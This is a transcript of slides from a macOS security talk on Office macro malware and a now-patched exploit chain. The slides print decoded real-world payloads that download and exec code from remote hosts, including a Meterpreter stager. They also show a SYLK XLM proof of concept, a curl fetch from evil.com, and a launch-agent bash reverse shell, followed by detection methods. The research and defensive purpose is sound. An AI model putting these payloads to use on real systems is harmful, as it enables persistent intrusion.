Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Office Drama on macOS

Office Drama on macOS

On the Windows platform, macro-based Office attacks are well understood (and frankly are rather old news). However on macOS, though such attacks are growing in popularity and are quite en vogue, they have received far less attention from the research and security community.

In this talk, we will begin by analyzing recent documents that contain macro-based attacks targeting Apple's desktop OS, highlighting the macOS-specific exploit code and payloads. Though sophisticated APT groups are behind several of these attacks, (luckily) these malicious documents and their payloads are constrained by recent application and OS-level security mechanisms.

However, things could be far worse! To illustrate this claim, we'll detail the creation of a powerful exploit chain, that begins with CVE-2019-1457, leveraged a new sandbox escape and ended with a full bypass of Apple's stringent notarization requirements. Triggered by simply opening a malicious (macro-laced) Office document, no other user interaction was required in order to persistently infect even a fully-patched macOS Catalina system!

To end the talk, we'll discuss various prevention and detection mechanisms that could thwart each stage of the exploit chain, as well as that aim to generically provide protection against future attacks!

Patrick Wardle

August 05, 2020
Tweet

More Decks by Patrick Wardle

Other Decks in Technology

Transcript

  1. ...defined MACROS Macro: "A macro is a series of commands

    & instructions that you group together as a single command to accomplish a task automatically" -Microsoft Sub AutoOpen() MsgBox "Hello World!", 0, "Title" End Sub 01 02 03 + MSOffice document + code tl;dr: add code to documents macro code (VBScript)
  2. now on macOS? MACROS more macs... malicious & potentially unwanted

    files for macOS (Kasperksy) more mac malware...
  3. macro attack 2017 "New Attack, Old Tricks" objective-see.com/blog/blog_0x17.html "U.S. Allies

    and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm" discovery & (limited) detection
  4. macro attack 2018 "Word to Your Mac" objective-see.com/blog/blog_0x3A.html "BitcoinMagazine- Quidax_InterviewQuestions_2018.docm"

    download & exec 2nd-stage (python) payload sandbox escape! discovery & (limited) detection
  5. macro attack 2019 "Cryptocurrency businesses still being targeted by Lazarus"

    securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus "ࢠ೒_ӝࣿࢎস҅ദࢲ(߮୊ӝসಣоਊ.doc" is mac? infected document (credit: kaspersky) download & exec 2nd-stage (mach-O) payload
  6. EXTRACTING EMBEDDED MACROS oletools, ftw $ sudo pip install -U

    oletools $ olevba -c <path/to/document> $ olevba -c ~/Documents/HelloWorld.docm olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools ===================================================================== FILE: /Users/patrick/Documents/HelloWorld.docm Type: OpenXML --------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub AutoOpen() MsgBox "Hello World!", 0, "Title" End Sub github.com/decalage2/oletools installation/usage AutoOpen() "(automatically) runs after you open a new document" macro extraction "Description of behaviors of AutoExec & AutoOpen macros" support.microsoft.com/en-us/help/286310/description-of-behaviors-of-autoexec-and-autoopen-macros-in-word
  7. ANALYSIS: "U.S. Allies & Rivals Digest Trump's Victory" $ olevba

    -c "U.S. Allies and Rivals Digest Trump's Victory.docm" VBA MACRO ThisDocument.cls in file: word/vbaProject.bin - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub autoopen() Fisher End Sub Public Sub Fisher() Dim result As Long Dim cmd As String cmd = "ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBvcnQgc3" cmd = cmd + "NsOwppZiBoYXNhdHRyKHNzbCwgJ19jcmVhdGVfdW52ZXJpZm" ... result = system("echo ""import sys,base64;exec(base64.b64decode( \"" " & cmd & " \""));"" | python &") End Sub 'Fisher' subroutine: automatically executed concat base64-encoded str. decode & exec via python Fisher() embedded macros via 'autoopen' Sub 'Fisher()':
  8. $ python >>> import base64 >>> cmd = "ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBv ....

    " >>> base64.b64decode(cmd) ... dXFprvsgMBSIyPf = 'atfMzZOqVLbcj' import ssl; import sys, urllib2; import re, subprocess; cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess.Popen(cmd, shell = True, stdout = subprocess.PIPE) out = ps.stdout.read() ps.stdout.close() if re.search("Little Snitch", out): sys.exit() ... a = o.open('https://www.securitychecking.org:443/index.asp').read(); key = 'fff96aed07cb7ea65e7f031bd714607d'; S, j, out = range(256), 0, [] for i in range(256): j = (j + S[i] + ord(key[i % len(key)])) % 256 S[i], S[j] = S[j], S[i] ... exec(''.join(out)) "U.S. Allies & Rivals Digest Trump's Victory" ANALYSIS: decoded python code ...looks familiar!? LittleSnitch running? firewall check Download 2nd-stage payload (www.securitychecking.org) RC4 decrypt this payload (key: fff96aed07cb7ea...) Execute decrypted payload EmPyre (python backdoor)
  9. ANALYSIS: "BitcoinMagazine-Quidax_InterviewQuestions_2018" $ olevba -c "BitcoinMagazine-Quidax_InterviewQuestions_2018.docm" Private Sub Document_Open() payload

    = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ" & "...6c30pCg==')));" path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.xpnsec.plist" arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & _ "<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ...">\n" & _ "<plist version=""1.0"">\n" & _ "<dict>\n" & _ "<key>Label</key>\n" & _ "<string>com.xpnsec.sandbox</string>\n" & _ "<key>ProgramArguments</key>\n" & _ "<array>\n" & _ "<string>python</string>\n" & _ "<string>-c</string>\n" & _ "<string>" & payload & "</string>" & _ "</array>\n" & _ "<key>RunAtLoad</key>\n" & _ "<true/>\n" & _ "</dict>\n" & _ "</plist>" Result = system("echo """ & arg & """ > '" & path & "'", "r") 'Result = system("launchctl bootout gui/$UID", "r") End Sub 'Document_Open()': triggers automatic execution create ~$com.xpnsec.plist decode & exec via python
  10. $ python >>> import base64 >>> payload = "aW1wb3J0IHNvY2tldCxzdHJ1Y3Qs3IgeCBpbiByYW5n...30pCg==" >>>

    base64.b64decode(payload) "import socket,struct,time\nfor x in range(10):\n\ttry: \n\t\ts=socket.socket(2,socket.SOCK_STREAM) \n\t\ts.connect(('109.202.107.20',9622))\n\t\tbreak\n\texcept: \n\t\ttime.sleep(5)\nl=struct.unpack('>I',s.recv(4))[0]\nd=s.recv(l) \nwhile len(d)<l:\n\td+=s.recv(l-len(d))\nexec(d,{'s':s})\n" "BitcoinMagazine-Quidax_InterviewQuestions_2018" ANALYSIS: import socket, struct, time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('109.202.107.20',9622)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(d,{'s':s}) 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 download & exec ...Meterpreter 109.202.107.20
  11. ANALYSIS: "BitcoinMagazine-Quidax_InterviewQuestions_2018" path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.xpnsec.plist" arg = "<?xml

    version=""1.0"" ...>\n" & _ "<!DOCTYPE plist PUBLIC ...">\n" & _ "<plist version=""1.0"">\n" & _ "<key>Label</key>\n" & _ "<string>com.xpnsec.sandbox</string>\n" & _ ... "</plist>" Result = system("echo """ & arg & """ > '" & path & "'", "r") "Escaping the Microsoft Office Sandbox" objective-see.com/blog/blog_0x35.html $ codesign --display -v --entitlements - "Microsoft Word.app" ... com.apple.security.temporary-exception.sbpl (allow file-read* file-write* (require-any (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~\$[^/]+$")) ) ) embedded macro code ..."stolen"!? Word's Sandbox Profile "....allows us to create a file anywhere on the filesystem as long as it ends with ~$something" -(Adam Chester) sandbox escape via /Library/LaunchAgents/~$com.xpnsec.plist Adam's PoC
  12. ANALYSIS: "ࢠ೒_ӝࣿࢎস҅ദࢲ(߮୊ӝসಣоਊ.doc" $ olevba -c "ࢠ೒_ӝࣿࢎস҅ദࢲ(߮୊ӝসಣоਊ.doc" Sub AutoOpen() ... #If

    Mac Then sur = "https://nzssdm.com/assets/mt.dat" ... res = system("curl -o " & spath & " " & sur) res = system("chmod +x " & spath) res = popen(spath, "r") embedded (macOS-specific) macros 'AutoOpen()': triggers automatic execution "Lazarus APT Targets Mac Users with Poisoned Word Document" labs.sentinelone.com/lazarus-apt-targets-mac-users-poisoned-word-document/ macOS-specific logic nzssdm.com mt.dat (implant) download payload (via curl) set executable (via chmod +x) execute (via popen)
  13. ...rather lame (and dysfunctional?) CURRENT ATTACKS alert! app sandbox quarantine

    attribute + notarizations $ log stream Error kernel: (Quarantine) exec of /private/tmp/backdoor denied ...since it was quarantined by Microsoft Word and created without user consent
  14. AUTOMATIC MACRO EXECUTION ...with no alerts Excel 2019 "In Office

    2011 for Mac, XLM Macro's in Sylk files are auto executed (no protected mode or macro prompt)" -The MS Office Magic Show" (2018), Pieter Ceelen & Stan Hegt only Office 2011, Microsoft: #wontfix "The Microsoft Office (2016, 2019) for Mac option "Disable all macros without notification" enables XLM macros without prompting..." -CERT, vulnerability note VU#125336 (11/2019) macro security no prompt! latest version of Office!
  15. XLM MACROS IN SYLK FILES ...ollld file format! "Abusing the

    SYLK file format" outflank.nl/blog/2019/10/30/abusing-the-sylk-file-format/ XLM: macro language predating VBA Sylk (.slk) files SYmbolic LinK, (1980s file format) } still supported! ID;P O;E NN;NAuto_open;ER101C1;KOut Flank;F C;X1;Y101;K0;ECALL("libc.dylib","system","JC","open -a Calculator") C;X1;Y102;K0;EHALT() E 01 02 03 04 05 06 07 PoC.slk: spawn calc (via XLM)
  16. ...macros are (now) sandboxed SANDBOX BYPASS spawning calc, is now,

    far from end-game $ codesign --display -v --entitlements - "Microsoft Word.app" ... com.apple.security.temporary-exception.sbpl (allow file-read* file-write* (require-any (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~\$[^/]+$")) ) ) ...now patched "....allows us to create a file anywhere on the filesystem as long as it ends with ~$something" -(Adam Chester) <string> (deny file-write* (subpath (string-append (param "_HOME") "/Library/Application Scripts")) (subpath (string-append (param "_HOME") "/Library/LaunchAgents"))) </string> Word's (Office) Sandbox Profile "In a sandboxed application, child processes created with the Process class inherit the sandbox of the parent app" -Apple
  17. ...download & execute; allowed SANDBOX BYPASS escape? # processMonitor {

    "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", "process" : { "path" : "/usr/bin/curl", "arguments" : [ "curl", "-L", "http://evil.com/escape.py", "-o", "/tmp/~$escape.py" ], } }, { "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", "process" : { "path" : "/System/Library/.../2.7/bin/python2.7", "arguments" : [ "python", "/tmp/~$escape.py" ], } } curl / python...allowed! process monitor network comms script execution sandbox allows: sandboxed
  18. via user login item SANDBOX BYPASS #create (CF)URL to app

    (e.g. Terminal.app) appURL = CoreFoundation.CFURLCreateWithFileSystemPath( kCFAllocatorDefault, path2App.get_ref(), kCFURLPOSIXPathStyle, 1) #get the list of (existing) login items items = CoreServices.LSSharedFileListCreate( kCFAllocatorDefault, kLSSharedFileListSessionLoginItems, None) #add app to list of login items CoreServices.LSSharedFileListInsertItemURL( loginItems, kLSSharedFileListItemLast, None, None, appURL, None, None) 01 02 03 04 05 06 07 08 09 10 11 12 13 # TrueTree /System/Library/LaunchDaemons/com.apple.loginwindow.plist /System/Library/CoreServices/loginwindow.app /System/Applications/Utilities/Terminal.app ~$escape.py loginwindow -> login items (TrueTree, J. Bradley) un-sandboxed!
  19. ...macros are (now) sandboxed QUARANTINED / NOTARIZATION can't pass args

    to login items :( ...just persist our own (payload)? any created payload: com.apple.quarantine (can't $ xattr -rc in sandbox) $ xattr ~\$payload com.apple.quarantine $ xattr -p com.apple.quarantine /tmp/~\$payload 0086;5e4c4b7a;Microsoft Excel; NN;NAuto_open;ER101C1;KOut Flank;F C;X1;Y102;K0;ECALL("libc.dylib","system","JC","touch /tmp/\~\$payload") 01 02 blocked :(
  20. ...an idea QUARANTINED / NOTARIZATION a launch agent: run apple

    binary pass arguments! avoids `com.apple.quarantine` creating launch agents: disallowed! <string> (deny file-write* (subpath (string-append (param "_HOME") "/Library/LaunchAgents"))) </string> <?xml version="1.0" encoding="UTF-8"?> <plist version="1.0"> <dict> <key>ProgramArguments</key> <array> <string>/bin/bash</string> <string>-c</string> <string>/bin/bash -i &gt;&amp; /dev/tcp/<attacker ip>/8080 0&gt;&amp;1</string> </array> ... 01 02 03 04 05 06 07 08 09 10 reverse shell, via bash sandbox rule
  21. ...an idea QUARANTINED / NOTARIZATION sandbox escape ...apple only, with

    no args quarantine 'bypass' ...but can't create (from sandbox) escape create launch agent ...must find a way for an apple binary (with no arguments), to create a launch agent for us!
  22. ...an idea! ARCHIVE UTILITY.APP $ lsregister -dump ... rank: Default

    bundle: Archive Utility bindings: public.zip-archive, .zip Archive Utility Archive Utility.app Q: what happens if we "persist" a .zip file !? A: macOS invokes its default handler! (apple binary, outside the sandbox) .zip login item!? ~/Library/~$payload.zip LaunchAgents/ foo.plist launch agent "created"
  23. "remotely" infecting macOS FULL EXPLOIT CHAIN user opens .slk file

    downloads & "persists" ~$payload.zip LaunchAgents/ on (next) login, "Archive Utility" invoked & unzips ...creating launch agent on (next) login, launch agent runs ...reverse shell!
  24. an "unsandboxed" reverse shell ...game over! FULL EXPLOIT CHAIN <plist

    version="1.0"> <dict> <key>ProgramArguments</key> <array> <string>/bin/bash</string> <string>-c</string> <string>/bin/bash -i &gt;&amp; /dev/tcp/<attacker ip>/8080 0&gt;&amp;1</string> </array> ... 01 02 03 04 05 06 07 08 09 launch agent (reverse shell, via bash) runs outside sandbox can download & unquarantine files! OSX.WindTail final payload: (repurposed) OSX.WindTail
  25. ...Microsoft & Apple FIXES & BUG REPORTS "is a known

    issue ...on the Apple side" full report to Apple macro bug patched: CVE-2019-1457 patched: 10.15.3
  26. process monitoring DETECTION # ./processMonitor { "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", ...

    "path" : "/Applications/Microsoft Excel.app", "pid" : 1406 } { "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", "process" : { "path" : "/usr/bin/curl", "arguments" : [ "curl", "http://evil.com/escape.py", "-o", "/tmp/~$escape.py" ], "ppid" : 1406 } } { "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", "process" : { "path" : "/System/Library/.../2.7/bin/python2.7", "arguments" : [ "python", "/tmp/~$escape.py" ], "ppid" : 1406 } } Excel (pid: 1406) spawning curl & python!? curl python suspicious children!
  27. file monitoring (persistence) DETECTION # ./fileMonitor { "event" : "ES_EVENT_TYPE_NOTIFY_WRITE",

    "file" : { "destination" : "~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm", "path" : "/System/Library/CoreServices/backgroundtaskmanagementagent", } } login item persistence (backgrounditems.btm) "Block Blocking Login Items" objective-see.com/blog/blog_0x31.html non-app login item!? suspicious persistence!
  28. via JamfProtect (MonitorKit + Apple's game engine) GENERICALLY DETECTING MAC

    MALWARE MonitorKit Apple's game (logic) engine actions (alert, log, etc) alert ! ...in the news
  29. TAKE AWAYS Ensure your macOS systems are protected by a

    behavior-based security tool! macro attacks ...targeting macOS users defense in depth!!
  30. "THE ART OF MAC MALWARE" https://taomm.org Announcing: volume 0x1: Analysis

    infection vectors methods of persistence analysis tools & techniques visit: author: p. wardle free (online) books
  31. @patrickwardle • 'Cryptocurrency Businesses Still Being Targeted by Lazarus' -Kaspersky

    • 'Abusing the SYLK File Format' -Pieter Ceelen & Stan Hegt Pitts • 'Lazarus APT Targets Mac Users With Poisoned Word Document' -Phil Stokes RESOURCES: IMAGES: • WIRDOU.COM/ • GITHUB.COM/ARIS-T2 Office Drama